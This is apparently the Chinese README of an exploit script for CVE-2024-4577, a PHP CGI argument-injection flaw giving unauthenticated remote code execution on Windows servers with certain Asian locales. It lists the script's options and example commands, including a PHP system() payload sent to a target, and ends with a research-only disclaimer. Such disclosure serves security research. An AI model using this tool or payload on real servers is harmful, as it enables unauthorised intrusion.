CVE-2024-4577 PHP CGI漏洞已成为一个关键安全缺陷,允许通过参数注入实现远程代码执行。该漏洞在多个PHP版本中被发现,主要影响Windows上运行在特定区域设置(繁体中文、简体中文、日语)下的服务器。
该漏洞利用PHP CGI模式,绕过了以前的安全措施,使未经身份验证的攻击者能够执行任意代码。
利用脚本:
usage: python exploit.py -t http://127.0.0.1 -c calc
options:
-h, --help 显示帮助信息并退出
--target TARGET, -t TARGET
目标URL
--code CODE, -c CODE 要执行的系统命令
--php PHP, -p PHP 要执行的PHP命令
示例:
python3 exploit.py 192.168.130.100 80 calc
python .\CVE-2024-4577.py -t http://127.0.0.1 -p "<?php system('calc') ?>"

此利用脚本仅出于研究和开发有效防御技术的目的而创建。它不应用于任何恶意或未经授权的活动。脚本的作者和所有者不对因使用本软件而导致的任何误用或损害承担任何责任。请注意,用户应负责任地使用本软件,并且仅遵守适用的法律法规。请负责任地使用。